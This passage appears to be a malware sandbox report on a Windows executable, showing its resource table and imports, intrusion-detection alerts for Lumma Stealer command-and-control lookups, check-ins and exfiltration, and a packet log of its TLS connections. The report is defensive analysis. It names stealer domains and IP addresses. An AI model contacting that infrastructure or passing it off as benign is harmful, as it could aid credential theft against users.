                                                                                                                                                                                                                                            RT_ICON0x502a00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsRomanianRomania0.6923963133640553
                                                                                                                                                                                                                                            RT_ICON0x509680x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216RomanianRomania0.4772821576763486
                                                                                                                                                                                                                                            RT_ICON0x52f100x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024RomanianRomania0.7632978723404256
                                                                                                                                                                                                                                            RT_STRING0x53ab00x496dataRomanianRomania0.4454855195911414
                                                                                                                                                                                                                                            RT_ACCELERATOR0x533a80x50dataRomanianRomania0.825
                                                                                                                                                                                                                                            RT_GROUP_CURSOR0x538580x22data1.0294117647058822
                                                                                                                                                                                                                                            RT_GROUP_ICON0x533780x30dataRomanianRomania0.9375
                                                                                                                                                                                                                                            RT_VERSION0x538800x230data0.5303571428571429
                                                                                                                                                                                                                                            DLLImport
                                                                                                                                                                                                                                            KERNEL32.dllEnumCalendarInfoA, WriteConsoleInputW, InterlockedDecrement, GetCurrentProcess, InterlockedCompareExchange, FindNextVolumeMountPointA, GetWindowsDirectoryA, EnumTimeFormatsW, ReadConsoleInputA, CopyFileW, GetConsoleAliasExesLengthW, CreateSemaphoreA, VerifyVersionInfoA, SetComputerNameExW, GetShortPathNameA, LCMapStringA, GetLogicalDriveStringsA, GetLastError, GetCurrentDirectoryW, SetLastError, GetProcAddress, VirtualAlloc, GetAtomNameA, LoadLibraryA, InterlockedExchangeAdd, SetCalendarInfoW, OpenEventA, GetCommMask, GlobalUnWire, GetModuleHandleA, FreeEnvironmentStringsW, EnumDateFormatsW, GetVersionExA, TerminateJobObject, GetCurrentProcessId, EnumCalendarInfoExA, CreateFileA, UnhandledExceptionFilter, SetUnhandledExceptionFilter, HeapReAlloc, HeapAlloc, GetCommandLineA, GetStartupInfoA, TerminateProcess, IsDebuggerPresent, GetModuleHandleW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, GetCurrentThreadId, Sleep, HeapSize, ExitProcess, MultiByteToWideChar, ReadFile, EnterCriticalSection, LeaveCriticalSection, SetHandleCount, GetStdHandle, GetFileType, DeleteCriticalSection, HeapFree, WriteFile, GetModuleFileNameA, SetFilePointer, HeapCreate, VirtualFree, CloseHandle, FreeEnvironmentStringsA, GetEnvironmentStrings, WideCharToMultiByte, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, RaiseException, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, InitializeCriticalSectionAndSpinCount, RtlUnwind, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW
                                                                                                                                                                                                                                            ole32.dllCoSuspendClassObjects
                                                                                                                                                                                                                                            WINHTTP.dllWinHttpCheckPlatform
                                                                                                                                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                            RomanianRomania
                                                                                                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                            2025-01-02T20:16:36.519517+01002058608ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (enterwahsh .biz)1192.168.2.7545381.1.1.153UDP
                                                                                                                                                                                                                                            2025-01-02T20:16:36.532234+01002058514ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wordyfindy .lat)1192.168.2.7601671.1.1.153UDP
                                                                                                                                                                                                                                            2025-01-02T20:16:36.543814+01002058502ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (slipperyloo .lat)1192.168.2.7611641.1.1.153UDP
                                                                                                                                                                                                                                            2025-01-02T20:16:36.555116+01002058492ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (manyrestro .lat)1192.168.2.7539371.1.1.153UDP
                                                                                                                                                                                                                                            2025-01-02T20:16:36.565149+01002058500ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shapestickyr .lat)1192.168.2.7533771.1.1.153UDP
                                                                                                                                                                                                                                            2025-01-02T20:16:36.577393+01002058510ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (talkynicer .lat)1192.168.2.7576641.1.1.153UDP
                                                                                                                                                                                                                                            2025-01-02T20:16:36.589526+01002058484ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (curverpluch .lat)1192.168.2.7649561.1.1.153UDP
                                                                                                                                                                                                                                            2025-01-02T20:16:36.600816+01002058512ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tentabatte .lat)1192.168.2.7616921.1.1.153UDP
                                                                                                                                                                                                                                            2025-01-02T20:16:36.612478+01002058480ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bashfulacid .lat)1192.168.2.7520391.1.1.153UDP
                                                                                                                                                                                                                                            2025-01-02T20:16:37.300052+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749700104.102.49.254443TCP
                                                                                                                                                                                                                                            2025-01-02T20:16:38.355437+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.749700104.102.49.254443TCP
                                                                                                                                                                                                                                            2025-01-02T20:16:38.960921+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749701172.67.157.254443TCP
                                                                                                                                                                                                                                            2025-01-02T20:16:39.387797+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.749701172.67.157.254443TCP
                                                                                                                                                                                                                                            2025-01-02T20:16:39.387797+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749701172.67.157.254443TCP
                                                                                                                                                                                                                                            2025-01-02T20:16:40.006203+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749702172.67.157.254443TCP
                                                                                                                                                                                                                                            2025-01-02T20:16:40.457154+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.749702172.67.157.254443TCP
                                                                                                                                                                                                                                            2025-01-02T20:16:40.457154+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749702172.67.157.254443TCP
                                                                                                                                                                                                                                            2025-01-02T20:16:41.147673+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749703172.67.157.254443TCP
                                                                                                                                                                                                                                            2025-01-02T20:16:42.581309+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749704172.67.157.254443TCP
                                                                                                                                                                                                                                            2025-01-02T20:16:44.220146+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749705172.67.157.254443TCP
                                                                                                                                                                                                                                            2025-01-02T20:16:46.058309+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749706172.67.157.254443TCP
                                                                                                                                                                                                                                            2025-01-02T20:16:47.123519+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749708172.67.157.254443TCP
                                                                                                                                                                                                                                            2025-01-02T20:16:47.622921+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.749708172.67.157.254443TCP
                                                                                                                                                                                                                                            2025-01-02T20:16:48.194549+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749714172.67.157.254443TCP
                                                                                                                                                                                                                                            2025-01-02T20:16:49.039380+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749714172.67.157.254443TCP
                                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:36.638536930 CET49700443192.168.2.7104.102.49.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:36.638587952 CET44349700104.102.49.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:36.638670921 CET49700443192.168.2.7104.102.49.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:36.641243935 CET49700443192.168.2.7104.102.49.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:36.641254902 CET44349700104.102.49.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:37.299967051 CET44349700104.102.49.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:37.300051928 CET49700443192.168.2.7104.102.49.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:37.307849884 CET49700443192.168.2.7104.102.49.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:37.307876110 CET44349700104.102.49.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:37.308362007 CET44349700104.102.49.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:37.356175900 CET49700443192.168.2.7104.102.49.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:37.669960976 CET49700443192.168.2.7104.102.49.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:37.715333939 CET44349700104.102.49.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:38.355495930 CET44349700104.102.49.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:38.355535984 CET44349700104.102.49.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:38.355571032 CET44349700104.102.49.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:38.355591059 CET44349700104.102.49.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:38.355612993 CET44349700104.102.49.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:38.355693102 CET49700443192.168.2.7104.102.49.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:38.355707884 CET44349700104.102.49.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:38.355756998 CET49700443192.168.2.7104.102.49.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:38.355778933 CET49700443192.168.2.7104.102.49.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:38.448235035 CET44349700104.102.49.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:38.448278904 CET44349700104.102.49.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:38.448323965 CET49700443192.168.2.7104.102.49.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:38.448345900 CET44349700104.102.49.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:38.448394060 CET49700443192.168.2.7104.102.49.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:38.453221083 CET44349700104.102.49.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:38.453280926 CET49700443192.168.2.7104.102.49.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:38.453291893 CET44349700104.102.49.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:38.453331947 CET49700443192.168.2.7104.102.49.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:38.453336954 CET44349700104.102.49.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:38.453371048 CET44349700104.102.49.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:38.453409910 CET49700443192.168.2.7104.102.49.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:38.472929955 CET49700443192.168.2.7104.102.49.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:38.472956896 CET44349700104.102.49.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:38.472971916 CET49700443192.168.2.7104.102.49.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:38.472978115 CET44349700104.102.49.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:38.484042883 CET49701443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:38.484078884 CET44349701172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:38.484222889 CET49701443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:38.484509945 CET49701443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:38.484519958 CET44349701172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:38.960742950 CET44349701172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:38.960921049 CET49701443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:38.964041948 CET49701443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:38.964052916 CET44349701172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:38.964456081 CET44349701172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:38.966089010 CET49701443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:38.966145039 CET49701443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:38.966186047 CET44349701172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:39.387799978 CET44349701172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:39.387931108 CET44349701172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:39.388098001 CET49701443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:39.388242006 CET49701443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:39.388242006 CET49701443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:39.388262987 CET44349701172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:39.388276100 CET44349701172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:39.500657082 CET49702443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:39.500713110 CET44349702172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:39.500793934 CET49702443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:39.501270056 CET49702443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:39.501286983 CET44349702172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:40.006087065 CET44349702172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:40.006202936 CET49702443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:40.007793903 CET49702443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:40.007803917 CET44349702172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:40.008181095 CET44349702172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:40.009886026 CET49702443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:40.009917021 CET49702443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:40.009984970 CET44349702172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:40.457176924 CET44349702172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:40.457242966 CET44349702172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:40.457283974 CET44349702172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:40.457320929 CET44349702172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:40.457370043 CET49702443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:40.457370043 CET49702443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:40.457381964 CET44349702172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:40.457443953 CET44349702172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:40.457480907 CET44349702172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:40.457525015 CET44349702172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:40.457536936 CET49702443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:40.457541943 CET44349702172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:40.457681894 CET49702443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:40.461997986 CET44349702172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:40.462089062 CET44349702172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:40.462100029 CET49702443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:40.462115049 CET44349702172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:40.462173939 CET49702443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:40.462178946 CET44349702172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:40.512559891 CET49702443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:40.544105053 CET44349702172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:40.544413090 CET44349702172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:40.544497013 CET49702443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:40.547560930 CET49702443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:40.547560930 CET49702443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:40.547579050 CET44349702172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:40.547585964 CET44349702172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:40.684576988 CET49703443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:40.684616089 CET44349703172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:40.684803963 CET49703443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:40.685240030 CET49703443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:40.685251951 CET44349703172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:41.147598028 CET44349703172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:41.147672892 CET49703443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:41.149023056 CET49703443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:41.149039984 CET44349703172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:41.149347067 CET44349703172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:41.150489092 CET49703443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:41.150634050 CET49703443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:41.150660038 CET44349703172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:41.971997023 CET44349703172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:41.972270966 CET44349703172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:41.972506046 CET49703443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:41.972604990 CET49703443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:41.972628117 CET44349703172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:42.118664026 CET49704443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:42.118720055 CET44349704172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:42.119079113 CET49704443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:42.119079113 CET49704443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:42.119117975 CET44349704172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:42.581056118 CET44349704172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:42.581309080 CET49704443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:42.582431078 CET49704443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:42.582449913 CET44349704172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:42.582834959 CET44349704172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:42.583949089 CET49704443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:42.584088087 CET49704443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:42.584120989 CET44349704172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:42.588226080 CET49704443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:42.635364056 CET44349704172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:43.401393890 CET44349704172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:43.401516914 CET44349704172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:43.401576996 CET49704443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:43.401726961 CET49704443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:43.401746988 CET44349704172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:43.760560989 CET49705443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:43.760623932 CET44349705172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:43.760740995 CET49705443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:43.761131048 CET49705443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:43.761146069 CET44349705172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:44.220005035 CET44349705172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:44.220145941 CET49705443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:44.221822977 CET49705443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:44.221839905 CET44349705172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:44.222218037 CET44349705172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:44.223419905 CET49705443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:44.223634958 CET49705443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:44.223676920 CET44349705172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:44.223748922 CET49705443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:44.223748922 CET49705443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:44.223758936 CET44349705172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:44.267338991 CET44349705172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:44.875081062 CET44349705172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:44.875205994 CET44349705172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:44.875333071 CET49705443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:44.875628948 CET49705443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:44.875652075 CET44349705172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:45.406052113 CET49706443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:45.406102896 CET44349706172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:45.406186104 CET49706443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:45.406550884 CET49706443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:45.406563044 CET44349706172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:46.058111906 CET44349706172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:46.058309078 CET49706443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:46.060406923 CET49706443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:46.060435057 CET44349706172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:46.060810089 CET44349706172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:46.062246084 CET49706443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:46.062396049 CET49706443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:46.062407017 CET44349706172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:46.554866076 CET44349706172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:46.555001020 CET44349706172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:46.555140018 CET49706443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:46.555551052 CET49706443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:46.555573940 CET44349706172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:46.609496117 CET49708443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:46.609540939 CET44349708172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:46.609649897 CET49708443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:46.610009909 CET49708443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:46.610022068 CET44349708172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:47.123366117 CET44349708172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:47.123518944 CET49708443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:47.125313997 CET49708443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:47.125327110 CET44349708172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:47.125670910 CET44349708172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:47.127079964 CET49708443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:47.127172947 CET49708443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:47.127178907 CET44349708172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:47.622936010 CET44349708172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:47.623063087 CET44349708172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:47.623140097 CET49708443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:47.623399019 CET49708443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:47.623416901 CET44349708172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:47.628252983 CET49714443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:47.628292084 CET44349714172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:47.628371000 CET49714443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:47.628688097 CET49714443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:47.628700972 CET44349714172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:48.194356918 CET44349714172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:48.194549084 CET49714443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:48.196816921 CET49714443192.168.2.7172.67.157.254
